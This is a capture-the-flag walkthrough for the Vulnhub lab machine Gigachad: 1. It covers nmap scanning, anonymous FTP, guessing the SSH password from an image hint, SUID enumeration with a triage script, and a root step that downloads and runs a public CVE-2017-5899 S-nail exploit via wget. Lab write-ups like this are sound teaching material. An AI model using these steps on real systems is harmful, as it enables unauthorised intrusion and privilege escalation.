Gigachad : 1 Vulnhub Walkthrough
This is a writeup for the Vulnhub machine Gigachad: 1, which was released by tasiyanci.
Level : Beginner / Intermediate
Goal: Find user flag and root flag
Machine Discovery :
First, discover the target on the local network with a ping sweep: nmap -sn 192.168.1.0/24 (the lab in this writeup uses the 192.168.1.0/24 range; adjust it to your own network).
Port Scanning:
Once the target is found, run a full port scan with nmap (-p- covers all 65535 TCP ports; -A adds version detection, OS detection and the default NSE scripts, which is what later flags anonymous FTP):
nmap -A -T4 -p- 192.168.1.5
Exploiting User Flag:
The scan shows three open ports: FTP (21), SSH (22) and HTTP (80).
Port 80 serves a page with nothing useful on it, so we move on.
The nmap output also shows that the FTP server allows anonymous login, so we try that first:
ftp 192.168.1.5
Log in with the username anonymous and a blank password (just press Enter at the password prompt).
List the files with dir or ls: there is a single file called chadinfo.
Download it with get chadinfo, then read it locally with cat.
The file gives us the username chad and, as a hint for the password, the path /drippinchad.png on the web server. Let's check it out.
Opening http://192.168.1.5/drippinchad.png in a browser shows the image below.
According to the caption, the password is related to the place in the picture. If you recognise the place, skip the next steps; if not, download the image and run a reverse image search on it with Google Images.
Go to Google Images and the click on the Camera Icon
Now browse the files and insert your image
The results include several links that identify the place.
I followed the second link and found that it is the Maiden's Tower.
Port 22 (SSH) is open, so we try logging in as chad (the user from chadinfo) with passwords related to Maiden's Tower.
After some guessing, I found that the password is maidenstower.
So we log in over SSH with username chad and password maidenstower:
ssh chad@192.168.1.5
An ls in chad's home directory shows the user flag, user.txt.
Exploiting Root Flag:
To escalate privileges, a good first step is to enumerate SUID binaries, i.e. files that run with their owner's privileges (usually root) no matter who executes them:
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
Among the results is the setuid helper of the S-nail mail client. Older S-nail versions have a known local privilege escalation in that helper, CVE-2017-5899, and a public exploit is available.
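The find output is long on any real system, and most of it is standard. One way to make the odd entries stand out is to filter the listing against a baseline of SUID binaries expected on a stock install. The script below is an added example, not code from the original walkthrough: triage_suid and sample_suid_list are hypothetical helpers, the baseline is an assumed list for a typical Debian/Ubuntu system, and the sample listing (including the path used for the S-nail helper) is constructed data.

```sh
#!/bin/sh
# Added example: triage a SUID-binary listing by removing entries expected on a
# stock Debian/Ubuntu install, so the unusual ones stand out. Not part of the
# original walkthrough; the baseline and the sample listing are assumptions.

# SUID-root binaries expected on a typical Debian/Ubuntu system (assumed list;
# regenerate it from a clean install of the same release before relying on it).
SUID_BASELINE='
/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount /usr/bin/umount
/usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/fusermount
/usr/bin/pkexec /usr/bin/ntfs-3g /usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
'

# triage_suid: reads "ls -la" lines or bare paths on stdin and prints the paths
# that are not in the baseline. Paths containing spaces are not handled.
triage_suid() {
    known=" $(printf '%s' "$SUID_BASELINE" | tr '\n' ' ') "
    while IFS= read -r line; do
        path=${line##* }                   # last whitespace-separated field = path
        [ -n "$path" ] || continue
        case $path in                      # fold /bin and /sbin into /usr (usrmerge)
            /bin/*|/sbin/*) path="/usr$path" ;;
        esac
        case $known in
            *" $path "*) ;;                # expected on a stock system: skip
            *) printf '%s\n' "$path" ;;    # unexpected: investigate this one
        esac
    done
}

# Constructed sample in "ls -la" format (sizes and dates are made up; the
# s-nail helper path is a placeholder for wherever the package installs it).
sample_suid_list() {
    cat <<'EOF'
-rwsr-xr-x 1 root root  68208 May 28  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root  55528 Jul 21  2020 /bin/mount
-rwsr-xr-x 1 root root  44664 Jul 21  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root  18736 Jun 11  2020 /usr/lib/s-nail/s-nail-privsep
-rwsr-xr-x 1 root root  14480 Jan 19  2021 /usr/local/bin/backup
EOF
}

# Demo on the sample. On a real target, pipe find's output in instead:
#   find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | triage_suid
sample_suid_list | triage_suid
```

An entry that survives the filter is a lead, not a proof: confirm which package owns it and which version is installed (dpkg -S and dpkg -l on Debian-based systems) and check that version against the advisory before running any exploit. That is the step that connects the S-nail helper found here to CVE-2017-5899.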
I used the below Github exploit as the payload
In chad's home directory, fetch exploit.sh with wget (if the target has no internet access, download it on your own machine and copy it over with scp):
wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Then make it executable (chmod +x is enough; chmod 777 would also make the file world-writable, which is never needed here):
chmod +x exploit.sh
And then we will run the exploit
./exploit.sh
The exploit prints a success message and drops us into a root shell.
Change to /root and read root.txt, the final flag!
Thanks for reading! :)
Please let me know if you have any queries or suggestions.